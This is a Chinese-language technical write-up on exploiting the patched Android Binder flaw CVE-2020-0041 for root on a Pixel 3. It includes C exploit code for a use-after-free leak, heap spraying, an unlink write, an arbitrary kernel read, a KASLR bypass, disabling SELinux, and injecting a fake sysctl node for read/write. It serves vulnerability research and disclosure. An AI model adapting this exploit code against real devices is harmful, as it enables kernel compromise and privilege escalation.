深入分析Android Binder越界访问漏洞CVE-2020-0041（下）：获取root特权-安全KER

前言

几个月前，我们发现并利用了Binder驱动程序中的安全漏洞，随后在2019年12月10日向Google提交了这一漏洞。在2020年3月的Android安全公告中，已经实现该漏洞的修复，其编号为CVE-2020-0041。

在上一篇文章中，我们详细分析了这个漏洞，同时说明了如何利用该漏洞实现Google Chrome的沙箱逃逸。如果大家还没有阅读这篇文章，建议首先阅读上篇，以了解我们正在利用的漏洞详情以及可用原语。在本文中，我们将主要分析如何利用这一漏洞在Pixel 3设备上攻击内核并获得root特权。

关于内存损坏原语

如我们在前一篇文章中所分析的，当驱动程序正在处理经过验证的Binder事务时，可能会产生被攻击者损坏的风险。我们可以将这一过程分为两个阶段，具体如下：
1、在接收到事务后，将由用户空间组件进行处理。这包括libbinder以及上层。如果使用/dev/hwbinder，则就是libhwbinder。这就是我们在上一篇文章中用于攻击Chrome浏览器进程的方法。
2、使用事务缓冲区完成用户空间时，它要求驱动程序使用BC_FREE_BUFFER对其进行释放，这会导致驱动程序处理事务缓冲区。
接下来，我们分析Binder驱动程序中的事务缓冲区清理代码，我们考虑可能损坏了事务数据的场景：

static void binder_transaction_buffer_release(struct binder_proc *proc,
                          struct binder_buffer *buffer,
                          binder_size_t failed_at,
                          bool is_failure)
{
    int debug_id = buffer->debug_id;
    binder_size_t off_start_offset, buffer_offset, off_end_offset;

    binder_debug(BINDER_DEBUG_TRANSACTION,
             "%d buffer release %d, size %zd-%zd, failed at %llxn",
             proc->pid, buffer->debug_id,
             buffer->data_size, buffer->offsets_size,
             (unsigned long long)failed_at);

    if (buffer->target_node)
[1]     binder_dec_node(buffer->target_node, 1, 0);

    off_start_offset = ALIGN(buffer->data_size, sizeof(void *));
    off_end_offset = is_failure ? failed_at :
                off_start_offset + buffer->offsets_size;
[2]    for (buffer_offset = off_start_offset; buffer_offset < off_end_offset;
         buffer_offset += sizeof(binder_size_t)) {
        struct binder_object_header *hdr;
        size_t object_size;
        struct binder_object object;
        binder_size_t object_offset;

        binder_alloc_copy_from_buffer(&proc->alloc, &object_offset,
                          buffer, buffer_offset,
                          sizeof(object_offset));
        object_size = binder_get_object(proc, buffer,
                        object_offset, &object);
        if (object_size == 0) {
            pr_err("transaction release %d bad object at offset %lld, size %zdn",
                   debug_id, (u64)object_offset, buffer->data_size);
            continue;
        }
        hdr = &object.hdr;
        switch (hdr->type) {
        case BINDER_TYPE_BINDER:
        case BINDER_TYPE_WEAK_BINDER: {
            struct flat_binder_object *fp;
            struct binder_node *node;

            fp = to_flat_binder_object(hdr);
[3]         node = binder_get_node(proc, fp->binder);
            if (node == NULL) {
                pr_err("transaction release %d bad node %016llxn",
                       debug_id, (u64)fp->binder);
                break;
            }
            binder_debug(BINDER_DEBUG_TRANSACTION,
                     "        node %d u%016llxn",
                     node->debug_id, (u64)node->ptr);
[4]         binder_dec_node(node, hdr->type == BINDER_TYPE_BINDER,
                    0);
            binder_put_node(node);
        } break;

...

        case BINDER_TYPE_FDA: {
...
            /*
             * the source data for binder_buffer_object is visible
             * to user-space and the @buffer element is the user
             * pointer to the buffer_object containing the fd_array.
             * Convert the address to an offset relative to
             * the base of the transaction buffer.
             */
[5]         fda_offset =
                (parent->buffer - (uintptr_t)buffer->user_data) +
                fda->parent_offset;
            for (fd_index = 0; fd_index < fda->num_fds;
                 fd_index++) {
                u32 fd;
                binder_size_t offset = fda_offset +
                    fd_index * sizeof(fd);

                binder_alloc_copy_from_buffer(&proc->alloc,
                                  &fd,
                                  buffer,
                                  offset,
                                  sizeof(fd));
[6]             task_close_fd(proc, fd);
            }
        } break;
        default:
            pr_err("transaction release %d bad object type %xn",
                debug_id, hdr->type);
            break;
        }
    }
}

在[1]的位置，驱动程序检查当前事务是否存在目标Binder节点，如果存在，则对其引用计数进行递减。这非常关键，因为如果其引用计数达到0，可能就会触发释放该节点，但是我们无法控制这个指针。
在[2]中，驱动程序会遍历事务中的所有对象，并进入到switch语句，在其中为每种对象类型执行所需的清除操作。对于BINDER_TYPE_BINDER和BINDER_TYPE_WEAK_BINDER类型，清除操作会涉及到在[3]处使用fp->binder查找对象，然后在[4]处减少引用计数。由于从事务缓冲区中读取了fp->binder，因此我们实际上可以通过用另一个值来替换该值的方式，实现提早释放节点引用。反过来，这可能会导致binder_node对象的释放后使用（UAF）。
最后，对于BINDER_TYPE_FDA对象，我们可以破坏[5]中使用的parent->buffer字段，并最终在远程进程上关闭任意文件描述符。
在我们的利用过程中，我们以BINDER_TYPE_BINDER对象的引用计数为目标，以导致对binder_node类型结构的对象实现UAF。这与我们在OffensiveCon会议上分享的CVE-2019-2205 UAF漏洞利用方式完全相同。但是，我们在之前漏洞中利用过的某些技术，在最近的内核中不再可用。

使用Binder和自己进行通信

Binder驱动器的设计方式是：事务只能发送到我们从其他进程收到的句柄或上下文管理器（Handle 0）。通常，当需要与服务进行通信时，首先会向上下文管理器请求（在当前版本的Android中，使用的三个Binder域是servicemanager、hwservicemanager或vndservicemanager）请求句柄。
如果服务代表客户端创建子服务或对象，那么该服务会发送一个句柄，以便客户端可以与新对象进行通信。
在某些情况下，我们可以通过控制通信的两端来更好地实现漏洞利用，比如可以对竞争条件得到更好的控制。在特定情况下，我们还需要知道在发送事务时接收方Binder映射的地址，以防止崩溃的情况。此外，为了让我们拥有的损坏原语可以实现UAF，在接收过程中必须创建Binder节点，其fp->binder字段等于我们要损坏的sg_buf值（属于发送者地址空间）。
满足所有这些约束的最简单方法是控制事务的发送端和接收端。在这种情况下，我们可以访问所有必需的值，而无需使用信息泄露漏洞从远程进程中对其进行检索。
但是，我们不允许通过上下文管理器从非特权应用程序注册服务，因此就不能选择这种典型的利用方式。相反，我们在/dev/hwbinder域中使用了ITokenManager服务来设置通信通道。据我们所致，这个服务最初由Gal Beniamini在Project Zero的报告中公开使用：

Note that in order to pass the binder instance between process A and process B, the "Token Manager" service can be used. This service allows callers to insert binder objects and retrieve
20-byte opaque tokens representing them. Subsequently, callers can supply the same 20-byte token, and retrieve the previously inserted binder object from the service. The service is accessible even to (non-isolated) app contexts (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188).

为了具有自定义进程的句柄，我们在漏洞利用过程中使用了相同的机制。但是，需要注意的是，这里的“进程”并非是真正的实际进程，而是与Binder文件描述符关联的Binder结构。这意味着，我们可以打开两个Binder文件描述符，通过第一个文件描述符创建一个令牌，然后在第二个文件描述符中对其进行检索。这样一来，我们已经收到第一个文件描述符拥有的句柄，现在可以在两方之间发送Binder事务。

利用binder_node释放后使用实现数据泄露

驱动程序会以两种不同的方式来使用Binder节点，一种是将其作为事务内容的一部分，以便将其从一个进程传递到另一个进程；另一种方式是作为事务的目标。当用作事务的一部分时，将会从节点的rb-tree中检索这些节点，并对引用进行正确计数。当导致节点的释放后使用时，也会从rb-tree中删除。因此，当用于事务目标时，我们只能悬挂指向已释放节点的指针，因为在这种情况下，驱动程序将指向实际binder_node的指针存储在transaction->target_node中。
Binder驱动程序中有很多对target_node的引用，但是其中的许多引用是在事务的发送路径或调试代码中执行的。与其他相比，事务接收路径为我们提供了一种将一些数据泄露回用户空间的方法：

        struct binder_transaction_data *trd = &tr.transaction_data;

...

        if (t->buffer->target_node) {
            struct binder_node *target_node = t->buffer->target_node;
            struct binder_priority node_prio;

[1]         trd->target.ptr = target_node->ptr;
            trd->cookie =  target_node->cookie;
            node_prio.sched_policy = target_node->sched_policy;
            node_prio.prio = target_node->min_priority;
            binder_transaction_priority(current, t, node_prio,
                            target_node->inherit_rt);
            cmd = BR_TRANSACTION;
        } else {
            trd->target.ptr = 0;
            trd->cookie = 0;
            cmd = BR_REPLY;
        }

...

[2]     if (copy_to_user(ptr, &tr, trsize)) {
            if (t_from)
                binder_thread_dec_tmpref(t_from);

            binder_cleanup_transaction(t, "copy_to_user failed",
                           BR_FAILED_REPLY);

            return -EFAULT;
        }
        ptr += trsize;

在[1]中，驱动程序从target_node提取两个64位值到transaction_data结构中。随后，将这个结构复制到[2]的用户区域。因此，如果在释放target_node并将其替换为另一个对象之后再接收到事务，那么就可以在对应于ptr和cookie的偏移量位置读取两个64位字段。
我们可以在gdb上查看这个结构，并构建近期的Pixel 3内核，我们在偏移量0x58和0x60的位置可以分别找到这些字段：

(gdb) pt /o struct binder_node
/* offset    |  size */  type = struct binder_node {
/*    0      |     4 */    int debug_id;
/*    4      |     4 */    spinlock_t lock;
/*    8      |    24 */    struct binder_work {
/*    8      |    16 */        struct list_head {
/*    8      |     8 */            struct list_head *next;
/*   16      |     8 */            struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } entry;
/*   24      |     4 */        enum {BINDER_WORK_TRANSACTION = 1, BINDER_WORK_TRANSACTION_COMPLETE, BINDER_WORK_RETURN_ERROR, BINDER_WORK_NODE, BINDER_WORK_DEAD_BINDER, BINDER_WORK_DEAD_BINDER_AND_CLEAR, BINDER_WORK_CLEAR_DEATH_NOTIFICATION} type;

                               /* total size (bytes):   24 */
                           } work;
/*   32      |    24 */    union {
/*                24 */        struct rb_node {
/*   32      |     8 */            unsigned long __rb_parent_color;
/*   40      |     8 */            struct rb_node *rb_right;
/*   48      |     8 */            struct rb_node *rb_left;

                                   /* total size (bytes):   24 */
                               } rb_node;
/*                16 */        struct hlist_node {
/*   32      |     8 */            struct hlist_node *next;
/*   40      |     8 */            struct hlist_node **pprev;

                                   /* total size (bytes):   16 */
                               } dead_node;

                               /* total size (bytes):   24 */
                           };
/*   56      |     8 */    struct binder_proc *proc;
/*   64      |     8 */    struct hlist_head {
/*   64      |     8 */        struct hlist_node *first;

                               /* total size (bytes):    8 */
                           } refs;
/*   72      |     4 */    int internal_strong_refs;
/*   76      |     4 */    int local_weak_refs;
/*   80      |     4 */    int local_strong_refs;
/*   84      |     4 */    int tmp_refs;
/*   88      |     8 */    binder_uintptr_t ptr;
/*   96      |     8 */    binder_uintptr_t cookie;
/*  104      |     1 */    struct {
/*  104: 7   |     1 */        u8 has_strong_ref : 1;
/*  104: 6   |     1 */        u8 pending_strong_ref : 1;
/*  104: 5   |     1 */        u8 has_weak_ref : 1;
/*  104: 4   |     1 */        u8 pending_weak_ref : 1;

                               /* total size (bytes):    1 */
                           };
/*  105      |     2 */    struct {
/*  105: 6   |     1 */        u8 sched_policy : 2;
/*  105: 5   |     1 */        u8 inherit_rt : 1;
/*  105: 4   |     1 */        u8 accept_fds : 1;
/*  105: 3   |     1 */        u8 txn_security_ctx : 1;
/* XXX  3-bit hole   */
/*  106      |     1 */        u8 min_priority;

                               /* total size (bytes):    2 */
                           };
/*  107      |     1 */    bool has_async_transaction;
/* XXX  4-byte hole  */
/*  112      |    16 */    struct list_head {
/*  112      |     8 */        struct list_head *next;
/*  120      |     8 */        struct list_head *prev;

                               /* total size (bytes):   16 */
                           } async_todo;

                           /* total size (bytes):  128 */
                         }

在这里，我们需要找到可以随意分配和释放的对象，这些对象在上述偏移量位置处包含我们感兴趣的数据。在最初向Google报告此漏洞时，我们使用了覆盖selinux_enforcing的最小漏洞利用方式，同时还使用了kgsl_drawobj_sync来泄露指向自身的指针和指向内核函数的指针，这对于PoC来说就足够了。然而，如果要实现完整的root提权攻击，这还远远不够。
如果要实现完整的漏洞利用，我们需要使用与CVE-2019-2025漏洞利用相同的对象——用于跟踪eventpoll中监视文件的epitem结构：

    (gdb) pt /o struct epitem
    /* offset    |  size */  type = struct epitem {
    /*    0      |    24 */    union {
    /*                24 */        struct rb_node {
    /*    0      |     8 */            unsigned long __rb_parent_color;
    /*    8      |     8 */            struct rb_node *rb_right;
    /*   16      |     8 */            struct rb_node *rb_left;

                                       /* total size (bytes):   24 */
                                   } rbn;
    /*                16 */        struct callback_head {
    /*    0      |     8 */            struct callback_head *next;
    /*    8      |     8 */            void (*func)(struct callback_head *);

                                       /* total size (bytes):   16 */
                                   } rcu;

                                   /* total size (bytes):   24 */
                               };
    /*   24      |    16 */    struct list_head {
    /*   24      |     8 */        struct list_head *next;
    /*   32      |     8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } rdllink;
    /*   40      |     8 */    struct epitem *next;
    /*   48      |    12 */    struct epoll_filefd {
    /*   48      |     8 */        struct file *file;
    /*   56      |     4 */        int fd;

                                   /* total size (bytes):   12 */
                               } ffd;
    /*   60      |     4 */    int nwait;
    /*   64      |    16 */    struct list_head {
    /*   64      |     8 */        struct list_head *next;
    /*   72      |     8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } pwqlist;
    /*   80      |     8 */    struct eventpoll *ep;

    /*   88      |    16 */    struct list_head {
    /*   88      |     8 */        struct list_head *next;
    /*   96      |     8 */        struct list_head *prev;

                                   /* total size (bytes):   16 */
                               } fllink;

    /*  104      |     8 */    struct wakeup_source *ws;
    /*  112      |    16 */    struct epoll_event {
    /*  112      |     4 */        __u32 events;
    /* XXX  4-byte hole  */
    /*  120      |     8 */        __u64 data;

                                   /* total size (bytes):   16 */
                               } event;

                               /* total size (bytes):  128 */
                             }

如上所示，fllink链表与泄露字段重叠。Eventpoll使用这个列表链接正在监视同一个结构文件的所有epitem结构。因此，我们可以泄露一组内核指针。
在这里，有几种可能性，我们假设对于一个特定的结构文件只有一个这样的epitem结构，其数据结构类似于：

因此，如果我们在上图中泄露epitem的fllink内容，我们将在文件结构中看到两个相同的指针。那么，如果在同一个文件上有第二个epitem，会发生什么？

在这种情况下，如果我们同时从两个epitem泄露，我们将得到它们的地址，以及相应的结构文件地址。

在我们的漏洞利用中，在将它们用于写入原语之前，我们将使用这两种技巧来公开结构文件指针和已释放节点的地址。

但是，需要关注的是，为了泄漏数据，我们需要将待处理的事务排入队列，直到我们可以触发漏洞并释放binder_node为止。漏洞利用过程是通过为每个挂起事务分配专用线程，然后根据释放节点所需的次数来减少引用计数。这样一来，我们就可以随时根据需要来释放缓冲区，释放的次数与创建的挂起事务数量相同。

内存写入原语

为了识别内存写入原语，我们转向transaction->target_node字段的另一种用法——binder_transaction_buffer_release中引用计数的递减。假设我们已经使用完全受控制的对象替换了释放的节点。在这种情况下，驱动程序使用以下代码减少节点的引用计数：

static bool binder_dec_node_nilocked(struct binder_node *node,
                     int strong, int internal)
{
    struct binder_proc *proc = node->proc;

    assert_spin_locked(&node->lock);
    if (proc)
        assert_spin_locked(&proc->inner_lock);
    if (strong) {
        if (internal)
            node->internal_strong_refs--;
        else
            node->local_strong_refs--;
        if (node->local_strong_refs || node->internal_strong_refs)
            return false;
    } else {
        if (!internal)
            node->local_weak_refs--;
        if (node->local_weak_refs || node->tmp_refs ||
                !hlist_empty(&node->refs))
            return false;
    }

    if (proc && (node->has_strong_ref || node->has_weak_ref)) {
        if (list_empty(&node->work.entry)) {
            binder_enqueue_work_ilocked(&node->work, &proc->todo);
            binder_wakeup_proc_ilocked(proc);
        }
[1] } else {
        if (hlist_empty(&node->refs) && !node->local_strong_refs &&
            !node->local_weak_refs && !node->tmp_refs) {
            if (proc) {
                binder_dequeue_work_ilocked(&node->work);
                rb_erase(&node->rb_node, &proc->nodes);
                binder_debug(BINDER_DEBUG_INTERNAL_REFS,
                         "refless node %d deletedn",
                         node->debug_id);
            } else {
[2]             BUG_ON(!list_empty(&node->work.entry));
                spin_lock(&binder_dead_nodes_lock);
                /*
                 * tmp_refs could have changed so
                 * check it again
                 */
                if (node->tmp_refs) {
                    spin_unlock(&binder_dead_nodes_lock);
                    return false;
                }
[3]             hlist_del(&node->dead_node);
                spin_unlock(&binder_dead_nodes_lock);
                binder_debug(BINDER_DEBUG_INTERNAL_REFS,
                         "dead node %d deletedn",
                         node->debug_id);
            }
            return true;
        }
    }
    return false;
}

我们可以设置节点数据，以便到达[1]位置的else分支，并确保node->proc为NULL。在这种情况下，首先需要在[2]中进行list_empty检查。要绕过这一检查，我们需要设置一个空列表（即next和prev指向list_head自身），这就是我们之所以需要首先泄露节点地址的原因。
一旦绕过[2]处的检查之后，就可以在[3]处使用受控数据到达hlist_del。该函数执行以下操作：

static inline void __hlist_del(struct hlist_node *n)
{
    struct hlist_node *next = n->next;
    struct hlist_node **pprev = n->pprev;

    WRITE_ONCE(*pprev, next);
    if (next)
        next->pprev = pprev;
}

static inline void hlist_del(struct hlist_node *n)
{
    __hlist_del(n);
    n->next = LIST_POISON1;
    n->pprev = LIST_POISON2;
}

上述可以归结为经典的unlink原语，我们可以在其中设置X = Y和(Y+8) = X。因此，就得到了两个可写入的内核地址，我们可以使用该地址来破坏某些数据。另外，如果我们设置next = NULL，则只需要一个内核地址就可以执行一次8字节的NULL写入。

重新分配具有任意内容的释放节点

在获取导致内存崩溃的unlink原语的步骤中，我们假设可以使用受控制的对象替换释放的对象。我们并不需要完全控制该对象，只需要保证通过所有检查，触发hlist_del原语，同时保证不会崩溃即可。
为了实现这一点，我们使用了一种常见的技术——通过sendmsg syscall喷射控制消息。该系统调用的代码如下：

static int ___sys_sendmsg(struct socket *sock, struct user_msghdr __user *msg,
             struct msghdr *msg_sys, unsigned int flags,
             struct used_address *used_address,
             unsigned int allowed_msghdr_flags)
{
    struct compat_msghdr __user *msg_compat =
        (struct compat_msghdr __user *)msg;
    struct sockaddr_storage address;
    struct iovec iovstack[UIO_FASTIOV], *iov = iovstack;
    unsigned char ctl[sizeof(struct cmsghdr) + 20]
        __attribute__ ((aligned(sizeof(__kernel_size_t))));
    /* 20 is size of ipv6_pktinfo */
    unsigned char *ctl_buf = ctl;
    int ctl_len;
    ssize_t err;

...

        if (ctl_len > sizeof(ctl)) {
[1]         ctl_buf = sock_kmalloc(sock->sk, ctl_len, GFP_KERNEL);
            if (ctl_buf == NULL)
                goto out_freeiov;
        }
        err = -EFAULT;
        /*
         * Careful! Before this, msg_sys->msg_control contains a user pointer.
         * Afterwards, it will be a kernel pointer. Thus the compiler-assisted
         * checking falls down on this.
         */
[2]     if (copy_from_user(ctl_buf,
                   (void __user __force *)msg_sys->msg_control,
                   ctl_len))
            goto out_freectl;
        msg_sys->msg_control = ctl_buf;
    }

...


out_freectl:
    if (ctl_buf != ctl)
[3]    sock_kfree_s(sock->sk, ctl_buf, ctl_len);
out_freeiov:
    kfree(iov);
    return err;
}

如果请求的控制消息长度大于本地ctl缓冲区，则在[1]处将在内核堆上分配一个缓冲区。在[2]处，从用户区域复制控制消息。最后，在处理消息之后，在[3]位置释放分配的缓冲区。
一旦目标套接字缓冲区已满，我们就使用阻塞调用来导致系统调用阻塞，因此就会在[2]和[3]之间的线程之后发生阻塞。这样一来，我们就可以控制替换对象的生存周期。
我们还可以利用Jann Horn在发现PROCA漏洞中所使用的方法：完成sendmsg调用，然后立即使用例如signalfd文件描述符来重新分配对象。其优点在于，这样就不再需要为每个分配使用单独的线程，但是结果会非常相似。
在任何情况下，使用这种类型的喷射，我们都可以按照几乎完全控制的方式重新分配释放的binder_node，以便触发前面所述的写入原语。
但需要注意的一件事是，如果我们喷射失败，由于释放的内存中需要执行的操作和检查量非常大，因此最终会导致内核崩溃。但是，由于这种释放后使用的特性非常好，只要我们不触发写入原语，我们就可以简单地关闭Binder文件描述符，并且内核不会注意到任何影响。
因此，在尝试触发写入原语之前，我们使用泄露原语来验证是否已经成功重新分配节点。为此，我们只需要拥有大量待处理的事务，并在每次需要从释放后对象中泄露一些数据时读取其中的一个事务。如果数据不是我们所期望的，只需要关闭Binder文件描述符，然后重试一次即可。
即使存在相对不可靠的重新分配，上述的这一属性也使得漏洞利用非常可靠。

获取任意读取原语

在这里，我们使用与OffensiveCon 2020演讲中相同的任意读取技术。也就是说，我们损坏file->f_inode，并执行下面的代码进行读取：

int do_vfs_ioctl(struct file *filp, unsigned int fd, unsigned int cmd,
         unsigned long arg)
{
    int error = 0;
    int __user *argp = (int __user *)arg;
    struct inode *inode = file_inode(filp);

    switch (cmd) {

...

    case FIGETBSZ:
        return put_user(inode->i_sb->s_blocksize, argp);

...

如果大家阅读我们的幻灯片，早在2018年末，我们就使用了Binder映射喷射的方式来绕过PAN，并在受控制的位置获得了受控数据。但是，在摆脱长期内核端Binder映射的同时，还引入了我们在这里利用的漏洞。这意味着，我们不能再使用Binder映射喷射，而必须再找到另一种解决方案。
我们想到的解决方案是，将f_inode字段指向一个上层结构。该结构包含一个完全可控制的64位字段。我们可以使用ep_ctl(efd, EPOLL_CTL_MOD, fd, &event)来修改这个字段。因此，如果我们将数据字段与inode->i_sb字段对齐，就可以获得任意读取。
下面以图形化的方式展现了这一过程：

请关注我们在这里还损坏了epitem的fllink.next字段，由于我们的写入原语，该字段现在指向file->f_inode字段。如果曾经使用过这个字段，那么可能会出现问题，但是由于我们目前是这些结构文件和epitem实例的唯一用户，因此我们只需要避免调用任何使用它们的API就可以。
基于上述设置，我们现在就可以构建一个任意读取原语，如下所示：

uint64_t read32(uint64_t addr) {
   struct epoll_event evt;
   evt.events = 0;
   evt.data.u64 = addr - 24;
   int err = epoll_ctl(file->ep_fd, EPOLL_CTL_MOD, pipes[0], &evt);
   uint32_t test = 0xdeadbeef;
   ioctl(pipes[0], FIGETBSZ, &test);
   return test;
}

uint64_t read64(uint64_t addr) {
   uint32_t lo = read32(addr);
   uint32_t hi = read32(addr+4);

   return (((uint64_t)hi) << 32) | lo;
}

请注意，我们将epitem的数据字段设置为addr – 24，其中24是超级块结构中s_blocksize的偏移量。同样，即使s_blocksize原则上是64位长度，但由于ioctl代码仅会将其中的32位复制回用户区域，所以如果要读取64位值，我们需要读取两次。
现在，就拥有了一个任意读取，并且从最初泄露的内容中获得了结构文件的地址，我们可以简单地读取其f_op字段来检索内核.text指针。随后，将导致完全绕过KASLR：

/* Step 1: leak a pipe file address */

file = node_new("leak_file");

/* Only works on file implementing the 'epoll' function. */
while (!node_realloc_epitem(file, pipes[0]))
   node_reset(file);

uint64_t file_addr = file->file_addr;
log_info("[+] pipe file: 0x%lxn", file_addr);


/* Step 2: leak epitem address */
struct exp_node *epitem_node = node_new("epitem");
while (!node_kaddr_disclose(file, epitem_node))
   node_reset(epitem_node);

printf("[*] file epitem at %lxn", file->kaddr);

/* 
 * Alright, now we want to do a write8 to set file->f_inode.
 * Given the unlink primitive, we'll set file->f_inode = epitem + 80
 * and epitem + 88 = &file->f_inode.
 * 
 * With this we can change f_inode->i_sb by modifying the epitem data, 
 * and get an arbitrary read through ioctl.
 *
 * This is corrupting the fllink, so we better don't touch anything there!
 */

struct exp_node *write8_inode = node_new("write8_inode");
node_write8(write8_inode, file->kaddr + 120 - 40 , file_addr + 0x20);

printf("[*] Write done, should have arbitrary read now.n");
uint64_t fop = read64(file_addr + 0x28);
printf("[+] file operations: %lxn", fop);

kernel_base = fop - OFFSET_PIPE_FOP;
printf("[+] kernel base: %lxn", kernel_base);

禁用SELinux并设置任意写入原语

现在，我们已经知道了内核的基址，可以使用我们的写入原语在selinux_enforcing变量上写入一个NULL qword并将SELinux设置为宽容模式（Permissive Mode）。我们的漏洞利用程序在设置任意写入原语之前会执行此擦欧哦，因为我们的技术实际上需要禁用SELinux。
在考虑了几种选择之后，我们最终决定攻击内核用于处理/proc/sys的sysctl表，以及在相应位置挂起的所有数据。有许多描述这些变量的全局表，例如下面的kern_table：

static struct ctl_table kern_table[] = {
    {
        .procname   = "sched_child_runs_first",
        .data       = &sysctl_sched_child_runs_first,
        .maxlen     = sizeof(unsigned int),
        .mode       = 0644,
        .proc_handler   = proc_dointvec,
    },
#if defined(CONFIG_PREEMPT_TRACER) || defined(CONFIG_IRQSOFF_TRACER)
    {
        .procname       = "preemptoff_tracing_threshold_ns",
        .data           = &sysctl_preemptoff_tracing_threshold_ns,
        .maxlen         = sizeof(unsigned int),
        .mode           = 0644,
        .proc_handler   = proc_dointvec,
    },
    {
        .procname       = "irqsoff_tracing_threshold_ns",
        .data           = &sysctl_irqsoff_tracing_threshold_ns,
        .maxlen         = sizeof(unsigned int),
        .mode           = 0644,
        .proc_handler   = proc_dointvec,
    },

...

例如，第一个变量名为“sched_child_runs_first”，这意味着可以通过/proc/sys/kernel/sched_child_runs_first对其进行访问。由于文件模式为0644，因此只能由root执行写入（适用于SELinux限制），且这是一个整数。读写过程是由proc_dointvec函数处理，该函数将在访问文件时转换整数与字符串的不同表示形式。Data字段指向变量在内存中的位置，因此它就成为了获得任意读取/写入原语的一个重要目标。
我们最初尝试将其中一些变量作为目标，但随后意识到，这个表实际上仅在内核初始化期间使用。这意味着，损坏该表的内容，对我们似乎并不是很有帮助。但是，这个表会用于创建一组内存结构，这些内存结构定义了现有的sysctl变量及其权限。
这些结构可以通过分析sysctl_table_root结构来找到，该结构包含一个ctl_node节点的rb-tree，然后指向定义变量本身的ctl_table表。由于我们已经具有读取原语，因此我们可以解析树，并找到其中最左侧的节点，该节点不包含子节点。
在正常情况下，这个树的外观如下所示（我们只展现了左侧的子连接，以保证图示具有可读性）：

如果查看这些节点的字母顺序，可以看到左子节点都是按照字母来降序排列。实际上，这就是这些树中的平衡规则：左子节点必须比当前节点低，而右子节点必须更高。
因此，为了保证树的平衡，需要使用我们的写原语，向最左边节点添加名称以“aaa”开头的左子节点。下面代码将在prev_node中找到树的最左节点，这将会作为我们虚假节点的插入点：

/* Now we can prepare our magic sysctl node as s child of the left-most node */

uint64_t sysctl_table_root = kernel_base + SYSCTL_TABLE_ROOT_OFFSET;
printf("[+] sysctl_table_root = %lxn", sysctl_table_root);
uint64_t ctl_dir = sysctl_table_root + 8;

uint64_t node = read64(ctl_dir + 80);
uint64_t prev_node;
while (node != 0) {
   prev_node = node;
   node = read64(node + 0x10); 
}

为了插入新的节点，我们需要在内核内存中找到其位置。这是必要的，因为现代手机都使用了PAN（永不启用特权访问）功能，这可以防止内核无意中使用用户区域的内存。假设我们已经拥有一个任意的读取原语，可以通过解析从current->mm->pgd开始的进程页表，并在physmap中找到其中一个页面的地址来解决这一问题。此外，使用我们自定义用户空间页面的physmap别名往往是一个理想的选择，因为我们可以轻松地编辑节点，以更改要定位的数据地址，从而为我们提供了灵活的读/写原语。
我们通过以下方式来解析physmap别名：

/* Now resolve our mapping at 2MB. But first read memstart_addr so we can do phys_to_virt() */

memstart_addr = read64(kernel_base + MEMSTART_ADDR_OFFSET);
printf("[+] memstart_addr: 0x%lxn", memstart_addr);
uint64_t mm = read64(current + MM_OFFSET);
uint64_t pgd = read64(mm + 0x40);
uint64_t entry = read64(pgd);

uint64_t next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);
printf("[+] First level entry: %lx -> next table at %lxn", entry, next_tbl);

/* Offset 8 for 2MB boundary */
entry = read64(next_tbl + 8);
next_tbl = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);
printf("[+] Second level entry: %lx -> next table at %lxn", entry, next_tbl);

entry = read64(next_tbl);
uint64_t kaddr = phys_to_virt(((entry & 0xffffffffffff)>>12)<< 12);


*(uint64_t *)map = 0xdeadbeefbadc0ded;
if ( read64(kaddr) != 0xdeadbeefbadc0ded) {
   printf("[!] Something went wrong resolving the address of our mappingn");
   goto out;
}

请注意，我们需要读取memstart_addr的内容，以便能够在屋里地址和相应的physmap地址之间进行转换。无论如何，在运行这个代码之后，我们知道在进程地址空间0x200000处找到的数据也可以在内核空间的kaddr中找到。
这样，我们就可以设置新的sysctl节点，具体如下：

/* We found the insertion place, setup the node */

uint64_t node_kaddr = kaddr;
void *node_uaddr = map;

uint64_t tbl_header_kaddr = kaddr + 0x80;
void *tbl_header_uaddr = map + 0x80;

uint64_t ctl_table_kaddr = kaddr + 0x100;
ctl_table_uaddr = map + 0x100;

uint64_t procname_kaddr = kaddr + 0x200;
void * procname_uaddr = map + 0x200;

/* Setup rb_node */
*(uint64_t *)(node_uaddr + 0x00) = prev_node;              // parent = prev_node
*(uint64_t *)(node_uaddr + 0x08) = 0;                      // right = null
*(uint64_t *)(node_uaddr + 0x10) = 0;                      // left = null

*(uint64_t *)(node_uaddr + 0x18) = tbl_header_kaddr;       // my_tbl_header

*(uint64_t *)(tbl_header_uaddr) = ctl_table_kaddr;
*(uint64_t *)(tbl_header_uaddr + 0x18) = 0;                // unregistering
*(uint64_t *)(tbl_header_uaddr + 0x20) = 0;                // ctl_Table_arg
*(uint64_t *)(tbl_header_uaddr + 0x28) = sysctl_table_root;      // root
*(uint64_t *)(tbl_header_uaddr + 0x30) = sysctl_table_root;      // set
*(uint64_t *)(tbl_header_uaddr + 0x38) = sysctl_table_root + 8;  // parent
*(uint64_t *)(tbl_header_uaddr + 0x40) = node_kaddr;          // node
*(uint64_t *)(tbl_header_uaddr + 0x48) = 0;                // inodes.first

/* Now setup ctl_table */
uint64_t proc_douintvec = kernel_base + PROC_DOUINTVEC_OFFSET;
*(uint64_t *)(ctl_table_uaddr) = procname_kaddr;           // procname
*(uint64_t *)(ctl_table_uaddr + 8) = kernel_base;          // data == what to read/write
*(uint32_t *)(ctl_table_uaddr + 16) = 0x8;                 // max size
*(uint64_t *)(ctl_table_uaddr + 0x20) = proc_douintvec;       // proc_handler
*(uint32_t *)(ctl_table_uaddr + 20) = 0666;             // mode = rw-rw-rw-

/*
 * Compute and write the node name. We use a random name starting with aaa
 * for two reasons:
 *
 *  - Must be the first node in the tree alphabetically given where we insert it (hence aaa...)
 *
 *  - If we already run, there's a cached dentry for each name we used earlier which has dangling 
 *    pointers but is only reachable through path lookup. If we'd reuse the name, we'd crash using 
 *    this dangling pointer at open time.
 *
 * It's easier to have a unique enough name instead of figuring out how to clear the cache,
 * which would be the cleaner solution here.
 */

int fd = open("/dev/urandom", O_RDONLY);
uint32_t rnd;
read(fd, &rnd, sizeof(rnd));

sprintf(procname_uaddr, "aaa_%x", rnd);
sprintf(pathname, "/proc/sys/%s", procname_uaddr);

/* And finally use a write8 to inject this new sysctl node */
struct exp_node *write8_sysctl = node_new("write8_sysctl");
node_write8(write8_sysctl, kaddr, prev_node + 16);

